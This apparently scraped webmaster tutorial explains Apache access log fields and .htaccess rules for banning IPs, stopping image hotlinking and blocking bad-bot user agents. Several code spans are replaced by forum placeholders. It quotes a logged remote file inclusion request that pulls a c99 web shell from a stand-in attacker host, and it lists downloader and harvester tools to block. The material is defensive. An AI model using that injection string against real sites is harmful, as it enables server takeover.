The fifth component is called the request. A request line has three parts, separated by spaces: a method name, the local path of the requested resource, and the version of HTTP being used. In our example, we have the GET method, the URL of the file that was requested and finally the protocol version. Method names are always in UPPER case, and you will see in your log files that the method can be GET, POST or HEAD. GET is by far the most common method you will see in your log files, followed by POST and HEAD. The POST method is used to send data to the server to be processed in some way, for instance by a PHP or CGI script. Forms are a good example of something that frequently uses the POST method. This is important to note because it gives you clues as to what is going on with your system, what files are being requested, and what forms are being accessed and how. The HEAD method asks the server to return the response headers only.
You will see this in your log file when a robot like InternetSeer is checking to see whether the system is alive and accessible, for example.

The next component in the request, number six if you are counting, is the status flag. This contains the error or status code generated by the request. The list of codes is pretty short for the possible conditions that can be returned to a request. Here is a summary of the most common codes used today:

Message Quick Reference:
200 OK, the request completed successfully
1xx indicates an informational message only

By far and away, the 200 OK success code is the most common code you will see in your log file, and the quick reference is most useful if you have a single record you are analyzing. On the other hand, if you wished to know whether you had a lot of 404 error codes, you could absolutely do a search to find them in your raw log file; however, you may want to check your error log instead. Doing a search for " 404 " (space, 404, space) in your standard text editor will produce too many false positives to be useful, though it will certainly find them if you are persistent.

The seventh component in the list is bytes. Obviously, this is the size (in bytes) of the document returned to the client. No big revelations here. You will notice that in our example the number of bytes is 60, which is the size of the message block that the script returned to the bad guy: nothing outrageous, just a message to let him know his attempted hack was busted! He didn't actually execute anything through the include file, because he was prevented from doing so by a function that monitors access and prohibits any direct call to it.

Number eight in the list is called the referrer. This important piece of information tells you where the visitor came from if they were on another site or page immediately before they accessed the current page.
If you have an affiliate program or link partnership, this could be important to you in terms of measuring how productive your partners are in sending visitors to your site, which links are working for you and, by their absence, which ones are not. It will also show which pages in your site visitors are surfing, so you can get a picture of how effective your content is in attracting visitors to explore your site, if that's important to you. If your visitors came to you via a search from one of the search engines, you will see that in your log file too. Notice that our example does not have a referrer listed, as it only contains the ubiquitous "-" in its place. In reality, while you are perusing your log files, you will find that most of your hits do not contain a referrer. In fact, in a recent analysis of 500 records, only 40% of them contained a referrer, which may be typical.

Finally, we have number nine in our survey, which is called the agent. This component contains the User-Agent HTTP request header. It includes information about the client's browser, for example, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7)". Generally speaking, the User-Agent is the identifying information that the client browser reports about itself. It normally comprises the Browser Name: Mozilla (code name for Netscape), the Browser Version: 5.0, the Browser Language: en-US (US English), and the Browser Operating System: WinNT 5.1. Sometimes the hardware platform and other version specifications are included as well. The rv: is the release version of the browser, in this case 1.7.7. By the way, you should keep in mind that many browsers allow the user to change their reported name, so you might see some obvious fake names in the listing.
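To tie the nine components together, here is a minimal Python sketch that splits the sample record from this tutorial into the named fields described above. It assumes the Apache "combined" format exactly as shown; the names COMBINED_RE, STATUS_CLASSES and parse_line are made up for this illustration and are not part of Apache or cPanel. The status class table is standard HTTP and is added here only for convenience.

```python
import re
from datetime import datetime

# Hypothetical helper names; the pattern assumes the "combined" LogFormat.
COMBINED_RE = re.compile(
    r'^(?P<remotehost>\S+) (?P<logname>\S+) (?P<authuser>\S+) '
    r'\[(?P<date>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# First digit of the status code -> general meaning (standard HTTP classes).
STATUS_CLASSES = {
    "1": "informational",
    "2": "success",
    "3": "redirection",
    "4": "client error",
    "5": "server error",
}


def parse_line(line):
    """Return a dict of the nine components, or None if the line does not match."""
    match = COMBINED_RE.match(line.strip())
    if match is None:
        return None
    fields = match.groupdict()
    fields["status"] = int(fields["status"])
    # Apache writes "-" when no body was sent.
    fields["bytes"] = 0 if fields["bytes"] == "-" else int(fields["bytes"])
    # Month names are parsed using the default (English) locale.
    fields["date"] = datetime.strptime(fields["date"], "%d/%b/%Y:%H:%M:%S %z")
    fields["status_class"] = STATUS_CLASSES.get(str(fields["status"])[0], "unknown")
    return fields


# The sanitized record discussed in this tutorial.
SAMPLE = '81.215.94.10 - - [01/Nov/2006:10:05:26 -0500] "GET /inc/design.inc.php?dir[inc]=http://thebadguyspartnerincrime.com/c99.txt? HTTP/1.1" 200 60 "-" "Opera/9.01 (Windows NT 5.1; U; tr)"'

entry = parse_line(SAMPLE)
for name in ("remotehost", "date", "request", "status", "bytes", "referrer", "agent"):
    print(name, "=", entry[name])
```

Run against a whole raw log, one line at a time, this gives you the same fields your control panel's analysis tool works from, so you can filter on whichever component you are investigating.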
So, now that we have covered all of the components in the log record, you are able to identify all the important elements of the submitted request by name, and you are able to explain what each piece of data references and why it matters in the log file.

Okay, so now that we know what's in the log file, big deal! What now? The fact is that you can use most of this information to start shutting down some of the craziness that is making your bandwidth go through the roof! Notice that we say "some of the craziness", because our action plan depends on the data that is sent to us and it isn't always correct. In other words, bad guys lie! So, even though we have an IP address that we can block, we are not guaranteed that this is the real bad guy's address; indeed, more likely than not it is a forgery, as the whole record may be as well. BUT, we have a starting point, and we can use it to prevent a repetitive attack on our system, which bad guys are quite likely to attempt. For example, you may see an attack from several different IP addresses where the attack content is the same. We can block the attack itself instead of the IP address, and simply block the IP address as a matter of routine in case it is used again, but blocking the attack should work no matter what IP address is specified.

Note: The following solutions assume that your site is hosted on an Apache web server (indeed this whole document makes the same assumption), that the mod_rewrite module is enabled, and that you can use an .htaccess file. If mod_rewrite is not enabled, we provide alternative solutions but again, specifically for the Apache web server.

The "blocking mechanism" is called .htaccess. It is available on all Apache Server systems and is a very effective access control method. .htaccess is a file that tells the server who can or cannot access the contents of the folder/directory it protects. .htaccess can be very simple or extremely complex, depending upon your system requirements.
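Before getting into .htaccess itself, here is a rough Python sketch of the "block the attack, not the IP address" idea mentioned above, applied to log analysis. It flags any request whose query string passes a remote URL as a parameter value, which is the signature of the injection attempt in our sample record. The function name and the list of URL schemes are assumptions chosen for this illustration; your own attack signatures may differ.

```python
from urllib.parse import parse_qsl

# Assumed signature: a query parameter whose value is itself a remote URL.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def looks_like_remote_include(request_target):
    """Return True if any query-string value starts with a remote URL scheme."""
    _path, _sep, query = request_target.partition("?")
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            return True
    return False


# The requested resource from the sample record in this tutorial.
attack = "/inc/design.inc.php?dir[inc]=http://thebadguyspartnerincrime.com/c99.txt?"
print(looks_like_remote_include(attack))             # True
print(looks_like_remote_include("/index.php?page=2"))  # False
```

Because the check looks only at the content of the request, it catches the same attack no matter which IP address it arrives from.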
Although .htaccess can be used for a lot of different functions, we are primarily concerned with using it to control the traffic to our site that affects our bandwidth consumption, so if you are already using an .htaccess file for other purposes, you should back it up just in case. If you don't have an .htaccess file in place, you can easily create one in your favorite text editor.

By the way, Windows hates .htaccess files, doesn't know what to do with them and doesn't like it when you try to save them to disk either. The filename .htaccess begins with a '.' (dot). In effect, .htaccess is the file extension, so it really doesn't have a file name per se. So, it is not file.htaccess or somepagename.htaccess, it is simply named .htaccess. In the unix/linux world this type of file is supposed to be a "hidden" file, and as a result it is hidden on many operating systems as well, including Windows. You may have trouble finding or working with such hidden files on your local system. For example, on some Windows systems you may have to go to the command prompt (DOS mode) to find the file. However, most standard text editors should have no problem editing it. To work with it on a Windows box, create the file with a temporary name, such as badguy.htaccess, so you can work with it on your local computer. Then, when you transfer it to your remote server, you just need to rename it. Make sure you use a text editor and not a word processing program like Word, because a word processor will add hidden characters that may produce unpredictable results on your server.

Although this document is not intended to be a comprehensive guide to file access or server security, it will give some basic examples of how to protect your code from being hijacked and your resources from being squandered by bad guys and people who don't know any better. For a complete tutorial on this topic, search the web; several good ones are available.
You can also find web based tools that will help you generate .htaccess files automatically, but be advised that you really should have a good command of the basics before jumping into automated tools. Automated tools can be a form of mindless "copy and paste" that can do more harm than good if you don't know what your script is doing, or if suddenly everything stops working because of a problem with the .htaccess code. You should be able to look at it, understand what it is doing and, worst case, be able to troubleshoot it if necessary.

Okay, so we will be using a few different features of .htaccess in the following section to show you how you can protect your system and keep the bandwidth thieves at bay. The first one is simple. We can ban an IP address in a couple of different ways, but here is the basic one. If you had nothing else in your .htaccess file, it would look like this:

order allow,deny
deny from 81.215.94.10
allow from all

The first log file record we presented came from a bad guy from Turkey who has been trying to gain access to our system and exploit it. If that was really his IP address (which is unlikely, given that he appears to be using a robot to submit his requests), the above statement would prevent him from accessing our system from that address. In the real world, if he tried to run that same query with this .htaccess file in place, he would get a 403 Access Forbidden error screen and nothing else.

If you noticed that the bad guy was pounding your system with a group of IP addresses that are all in the same range, you could ban the whole range with the same command, slightly modified. Assuming that all of the IP addresses came from 81.215.94.xx, you would simply change the ban to:

order allow,deny
deny from 81.215.94.
allow from all

Notice that we only removed the digits in the last sequence of numbers. You must preserve the dot so that .htaccess knows you mean to ban the whole range from 0 - 255.

Side Note: As you may know, the IP address is a 32-bit binary address.
This 32-bit address is subdivided into four 8-bit segments called octets. The IP address is almost always expressed in what is called dotted decimal format, for example, 192.168.1.100, and in our log files we should always see the whole number displayed. For the purposes of banning IP addresses, you should know that part of the IP address is used for the network ID, and part of the address is used for the host ID. A simplified example is as follows: in the IPv4 model (the established standard IP structure), if you look at an IP address on a Class B network from left to right, the two octets on the left are the network address and the two octets on the right are the host address on that network. You should mostly be concerned with banning the host ID section, which is where the bad guy's playground is. Depending on what class of network he is on, you would want to block only the host section of the IP address. Rarely, if ever, would you need to block everything but the first octet, for example. Generally, blocking the whole range of hosts in the fourth octet will suffice, though we have noticed that this Turkish bad guy has used a number of different hosts across the last two octets, which means he is probably on a Class B network. Most IP addresses fall into the following address classes:

Class A addresses: The first 8 bits of the IP address are used for the network ID. The final 24 bits are used for the host ID.
Class B addresses: The first 16 bits of the IP address are used for the network ID. The final 16 bits are used for the host ID.
Class C addresses: The first 24 bits of the IP address are used for the network ID. The final 8 bits are used for the host ID.

With this information, you should have enough background to use IP banning intelligently without getting yourself into a whole lot of trouble.
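If you want to see how many addresses a range ban actually covers before you commit to it, Python's standard ipaddress module can do the arithmetic. The sketch below is only an illustration: the helper name is_banned is made up, and the two networks are written in CIDR notation, where 81.215.94.0/24 corresponds to banning the last octet and 81.215.0.0/16 to banning the last two octets.

```python
import ipaddress

# CIDR equivalents of banning the last octet and the last two octets.
last_octet_ban = ipaddress.ip_network("81.215.94.0/24")
last_two_octets_ban = ipaddress.ip_network("81.215.0.0/16")


def is_banned(ip, networks):
    """Return True if the dotted decimal address falls inside any banned network."""
    address = ipaddress.ip_address(ip)
    return any(address in network for network in networks)


print(last_octet_ban.num_addresses)       # 256 addresses (0 - 255 in the fourth octet)
print(last_two_octets_ban.num_addresses)  # 65536 addresses
print(is_banned("81.215.94.10", [last_octet_ban]))  # True
print(is_banned("81.215.95.10", [last_octet_ban]))  # False
```

The jump from 256 to 65,536 addresses for one extra octet is a good reminder of how quickly a wide ban starts catching innocent visitors.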
Remember, if you ban by ranges, you potentially cut out legitimate visitors to your site, so you need to use this technique prudently and judiciously to make sure you don't chop your own head off! Be aware that you would rarely, if ever, have to ban an IP address range beyond two octets. For example, if you were to ban all of the IP addresses in the entire Class C address space, you would be losing more than 500 million potential visitors to your site, so be cautious about what you ban when working with ranges. You can ban specific groups within an IP range as well, but that is outside the scope of this document, and you are encouraged to study the Apache documentation on .htaccess to find out what you can do on that topic.

So how did we know this bad guy was from Turkey? Good question! You can find some great tools on the internet that will allow you to do an IP lookup and find out where a specific IP address belongs, or at least what network and what host it is using. Given the nature of the internet, finding the computer that is using a particular IP address is not that simple, but you can certainly find what host they are using if, of course, they are not using a fake IP address. Unless they are really bad guys, more often than not you will be able to track the IP address to the correct host. Generally, the bandwidth thieves are pretty stupid and not too clever, so they are easy to track. For example, Code:
Content visible to registered members only. Please Click Here To Register

By the way, in case you don't know or are wondering what a "whois" record is, it provides information about who registered a website domain name and where the website is being hosted, as well as contact information for administrative and technical support. Looking up a site's whois record (you can use either the IP address or the domain name for the lookup) can help you figure out where a specific site or IP address is located and whether or not it is legitimate. Often, just knowing "where" an IP address or site is located can tell you much about how you should manage your investigation of a badguy, for example.

Okay, so what about those greedy, hijacking hotlinkers? No problem! First we need to find out if we have a hotlinker hijacking our great content, though you really don't have to find one in your logs if you assume, correctly, that all hotlinkers come in as referrers to your site. In the code below, your domain is assumed to be Code:
Content visible to registered members only. Please Click Here To Register Generally, hotlinkers do the most damage to your bandwidth by linking to images and media that is on your site. So, we want to write our restriction to include any and all types of media that might be a target and prevent it from being accessed by questionable requestors BUT we do want the same media to be available to visitors who are legitimately using our site. Another consideration we need to make is "empty" referrers. If someone calls the URL directly, the referrer field will not be populated so we need to check for empty referrer fields as well. Okay, so now that we have the above criteria we can develop our action plan to prevent unauthorized access of your media files. The relatively simple technique we propose is that you deploy the following set of instructions using mod_rewrite. RewriteEngine On RewriteCond %{HTTP_REFERER} !^ Code:
Content visible to registered members only. Please Click Here To Register
RewriteCond %{HTTP_REFERER} ^http:// [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule \.(jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$ - [F]

OMG! What the heck is that? Hold on, it only looks complicated. This particular chunk of code is what will prevent the bandwidth thieves from wreaking havoc on your bank account! As we mentioned, we need mod_rewrite to be enabled. In the listing we are doing some pretty simple stuff. First we make sure that the RewriteEngine is turned on, then we set the conditions we want to test for, and finally we state the rule that is applied if the conditions are met. This example listing will return a big "Forbidden Access" page in answer to any hotlinked request for the media files on your site (as you can see in the RewriteRule at the end of the listing, it covers most common media extensions; if you have media types not listed, you can easily add them to this rule).

The first line obviously turns on the RewriteEngine, followed by a condition that excludes your own site from the rule. The next condition covers any URL that refers its visitors to your content: basically, it says that if the referrer starts with http://, it matches the RewriteCond. The last condition requires that the referrer field is not empty, so direct requests with an empty referrer are let through. Because all of the conditions must hold together, the RewriteRule fires only for requests whose referrer is a non-empty http:// URL other than your own site, and in that case it returns a 403 Forbidden error instead of the requested image. Notice that the first half of each condition statement is the same: they all set the condition on HTTP_REFERER. The second part of the statement sets the terms of the condition, for example - "!^ Code:
Content visible to registered members only. Please Click Here To Register

A quick reference note (you can find the definitions here for all of the regular expression special characters used in this section of the document): . (dot) matches any single character, except the end of a line.

If you should be so inclined, you can even redirect your bandwidth thief to any site you deem worthy of their attention, with appropriate content to "wake them up" perhaps. Here is the code; you would simply modify the URL to point to a suitable site. RewriteRule .*\.(jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$ Code:
Content visible to registered members only. Please Click Here To Register

Of course, if you wanted to be creative, you could redirect them to your own image or media file to encourage the visitor to access your site directly and short circuit the hotlinker's plan. The possibilities are limited only by your imagination. RewriteRule .*\.(jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$ Code:
Content visible to registered members only. Please Click Here To Register

So, what if you don't have the ability to use mod_rewrite? What then? Thought you'd never ask! Not to worry, here is an alternative method that achieves pretty much the same end results using the SetEnvIfNoCase Referer technique:

SetEnvIfNoCase Referer "^http://www.yourdomain.com/" allowed=1
SetEnvIfNoCase Referer "^http://yourdomain.com/" allowed=1
SetEnvIfNoCase Referer "^$" allowed=1
<FilesMatch "\.(jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$">
Order Allow,Deny
Allow from env=allowed
</FilesMatch>

Basically, this method allows everyone on your site, with or without the www prefix, as well as requests with empty referrer fields, to access the media on your site. Everyone else is excluded by default. This set of instructions specifically identifies the acceptable users of your site rather than trying to exclude just the bad guys, though you could easily do that too if you have the URLs for them. For example, you can explicitly control who accesses your media using the following model (change the domain to fit your circumstances, of course):

SetEnvIfNoCase Referer "^http://www.yourdomain.com/" goodguys=1
SetEnvIfNoCase Referer "^http://www.yourdomain.com$" goodguys=1
SetEnvIfNoCase Referer "^http://yourdomain.com/" goodguys=1
SetEnvIfNoCase Referer "^http://yourdomain.com$" goodguys=1
SetEnvIfNoCase Referer "^http://www.bandwidthbandit.com$" badguys=1
SetEnvIfNoCase Referer "^http://bandwidthbandit.com/" badguys=1
SetEnvIfNoCase Referer "^$" goodguys=1
<FilesMatch "\.(jpg|jpeg|gif|png|bmp|swf|avi|wav|mpg)$">
Order Allow,Deny
Allow from env=goodguys
Deny from env=badguys
</FilesMatch>

As you can see, you have many options for controlling who can access your site and what they can access, but you should be aware that this is not a "one shot" exercise.
It requires at least a modest amount of attention to remain effective. You certainly don't need to be manic about monitoring your links and media, but you do need to be somewhat vigilant to ensure that you are getting the most bang out of your bandwidth buck!

Okay, so bring on the bots!

We covered botnet and badbot behavior and issues pretty extensively in the introduction, so now we need to figure out what to do about them. This section will simply focus on how you can prevent bots from eating up your bandwidth. Generally, your defense against unwanted bot activity is to filter on the HTTP_USER_AGENT, which is where bots normally place their identity information. By the end of this section, you will be able to write effective access control blocks to prevent the bad bots from accessing your system and therefore gain better control of your bandwidth consumption.

A really good reference can be found by doing a search for "A Close to perfect .htaccess ban list" in your favorite search engine. It should point you to a group of forums and threads on the webmasterworld.com site. Most of the contents of the following list came from references found in those threads. Despite the fact that the information is "old", surprisingly it is not stale, and new data concerning these bots is not very forthcoming. You will find the listings there are still useful, which says something about the robots and their authors.

SideNote: The same may not be said for the recent proliferation of botnet gangs who use badbots to shotgun pay-per-click sites.
They are constantly adapting to their environmental conditions (to avoid detection and/or capture - the capture rate for these badboys is in the single digit percent zone relative to the number of "known" botnets) and to their requirements (work orders for their services - the PPC assignments to target) so they can exploit the largest number of PPC clients with the greatest number of zombies they can recruit. Additionally, some of these zombie networks are being used to fraudulently scan desktop and back-end systems. They scan infected systems (and any other system they can access, for that matter) to obtain credit card numbers, bank accounts and personal information including log-ins and passwords. The operators can and do launch these scans from any computer on the botnet to mask their actual location.

The badbot gangs (supposedly about 200 worldwide that control hundreds of thousands of computers, mostly exposed and infected home PCs) primarily focus on PPC clients, spam distribution, email harvesting and phishing for financial information. Generally run by organized crime and terrorist operations, they rarely if ever get caught, and they wreak havoc everywhere they go with their worms, viruses, robots and zombie networks. Part of their success is their ability to disappear and reappear in an instant, like a chameleon. All of their operations are "portable" and can typically be completely dismantled and reassembled in a matter of hours.

The problem with trapping botnet zombies is that they are all basically home computers that have been hijacked, so the HTTP_USER_AGENT and the requests just "look" like a regular user/visitor to your site. Perhaps one clue would be traffic to the forms on your site. In our situation, we see a fair amount of "multiple" hits to our contact and addalink forms from the same IP addresses. Of course, all of our forms are equipped with captcha security images, so the bots cannot complete the form requirements and they go away.
In these cases we add the IP address to our Deny listings. We keep that section of our .htaccess file in numeric order so we can see whether a banned IP address is already entered, and we either add the new address to the list or modify an existing range to accommodate the new address.

Note: Securing your computer to avoid botnets is beyond the scope of this tutorial, but you can find many useful ideas and suggestions by doing a query for "botnets + security" on your favorite search engine.

Back on topic, most of the badbots in the listings presented here are ones that have been around for a while and are still very much active today. Trapping a bot is a little different from banning a hotlinker because you have to trap a value that might be "included" in a title instead of a whole URL that you know. For example, look at the first entry in our listing. This condition tells the server to look for an HTTP_USER_AGENT value that begins with BlackWidow (the ^ anchors the match to the start of the string). The server checks the incoming request to see if the HTTP_USER_AGENT begins with BlackWidow. If it does not, it drops to the next test and so on until it reaches the bottom of the list. In the event that the server does find the condition to be true, it goes to the rule and takes the appropriate action. Notice the [OR] flag at the end of each line in the list: it tells the server that a match on any one of the conditions is enough to trigger the rule.

By the way, you can increase the efficiency of the conditional statements if you provide both the "begin" and the "end" of each agent statement you want to block, because the server only has to look for the whole condition. Take, for example, the line that contains HTTrack. This conditional tells the server, "Look for this parameter contained anywhere within the HTTP_USER_AGENT record." This means the server has to search the whole record to find HTTrack if it exists, which is not very efficient. On the other hand, if you knew where it was in the record, you could write the conditional statement more efficiently.
Notice also that spaces need to be "escaped" using "\" the backward slash in the conditional statement.

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow [OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com [OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw [OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo [OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo [OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon [OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch [OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon [OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf [OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures [OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro [OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE [OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight [OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb! [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It [OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet [OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula [OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView [OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET [OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja [OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar [OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider [OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin [OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader [OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool [OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX [OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad [OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire [OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer [OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator [OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber [OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto [OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk [OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser [OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet [OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger [OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot [OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot [OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut [OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro [OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector [OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor [OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker [OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP [OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow [OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE [OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider [OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus
RewriteRule ^.* - [F,L]

Bots listed above will all receive a 403 Forbidden error when trying to access your site.
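If mod_rewrite is not available on your server, a rough equivalent of the list above can be sketched with the same SetEnvIfNoCase technique used earlier for hotlinking, matching on User-Agent instead of Referer. The variable name bad_bot is our own label for this illustration (an assumption, pick any name you like), only a handful of agents from the list are shown, and the access directives use the same Order/Allow/Deny style as the rest of this tutorial. Treat it as a starting point rather than a drop-in replacement:

```apache
# Sketch only: tag unwanted agents with an environment variable.
# "bad_bot" is a hypothetical variable name chosen for this example.
SetEnvIfNoCase User-Agent "^BlackWidow" bad_bot
SetEnvIfNoCase User-Agent "^EmailSiphon" bad_bot
SetEnvIfNoCase User-Agent "^WebZIP" bad_bot
# No ^ anchor here: matches HTTrack anywhere in the User-Agent string.
SetEnvIfNoCase User-Agent "HTTrack" bad_bot

# Allow everyone, then deny any request that carries the bad_bot tag.
# With "Order Allow,Deny", a matching Deny overrides the Allow.
Order Allow,Deny
Allow from all
Deny from env=bad_bot
```

Blocked agents should receive the same 403 Forbidden response. Keep in mind that SetEnvIfNoCase matches without regard to case, so every entry here behaves like the RewriteCond lines that carry the [NC] flag.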
The bandwidth savings and the decrease in server resource consumption that result from deploying this script will vary depending, of course, on your site traffic and how big the hijacking problem is on your site. However, the overall savings may be significant in many cases. Certainly, the conservation of bandwidth should far outweigh the resources required to run this script, and it provides you with measurable control over both the inbound and outbound traffic on your site.

If you experience performance problems using these tools, you may have to optimize them to the requirements of your site. You will probably need to do some benchmarking to identify whether or not you have a problem. Having said that, some sites that have monster .htaccess files have reported acceptable performance in benchmark testing relative to the degradation they were seeing before they started shutting down the malicious bad boys' activities.

Here is an example of a similar list that is managed a little differently and is slightly more complex. Basically, it is arranged alphabetically and combines several bots in a single statement using the "|" (OR) operator:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^(.*almaden\.ibm.*$|.*BackDoorBot.*$|.*BlowFish.*$|.*Bullseye.*$|.*CherryPicker.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*DISCo.*$|.*DTS\.Agent.*$|.*Enterprise_Search.*$|.*Extractor.*$|.*findlinks.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*fluffy.*$|.*GetRight.*$|.*GeoBot.*$|.*Girafabot.*$|.*Harvest.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*httplib.*$|.*HTTrack.*$|.*Harvest.*$|.*ia_archiver.*$|.*Jetbot.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*Keyword\ Density.*$|.*libWeb/.*$|.*libwww-perl.*$|.*lwp-trivial.*$|.*LinkScan.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*Linkextractor.*$|.*LWP.*$|.*MIIxpc.*$|.*moget.*$|.*Mo\ College.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*Openfind.*$|.*OrangeSpider.*$|.*picsearch.*$|.*prospector.*$|.*ProPowerBot.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*RepoMonkey.*$|.*Rover.*$|.*SuperBot.*$|.*Syntryx\ ANT\ Scout.*$|.*RepoMonkey.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*searchhippo.*$|.*Szukacz.*$|.*T8Abot.*$|.*Teleport.*$|.*TrueRobot.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*True_Robot.*$|.*URL\ Control.*$|.*VCI\ WebViewer.*$|.*webcraft.*$|.*WebZip.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*WebBandit.*$|.*WWWeasel.*$|.*Wge.*$|.*Wells\ Search.*$|.*WebmasterWorld\.com\ bot.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(.*WebZip.*$|.*WEP\ Search.*$|.*WUMPUS.*$|.*Xenu's.*$|.*Zeus.*$) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(ah-ha|aktuelles|amzn_assoc|asterias|attache) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(autohttp|ADSARobot|Alexibot|ASPSeek|ASSORT) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(ATHENS|b2w/0\.1|bew|big\.brother|bumblebee) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(BecomeBot|Black\ Hole|BlackWidow|Bot\ mailto:craftbot@yahoo\.com|BotALot) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(Browses|BuiltBotTough|Bullseye|BunnySlippers|cosmos) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(curl|CheeseBot|CherryPicker|ChinaClaw|CopyRightCheck) [NC,OR]
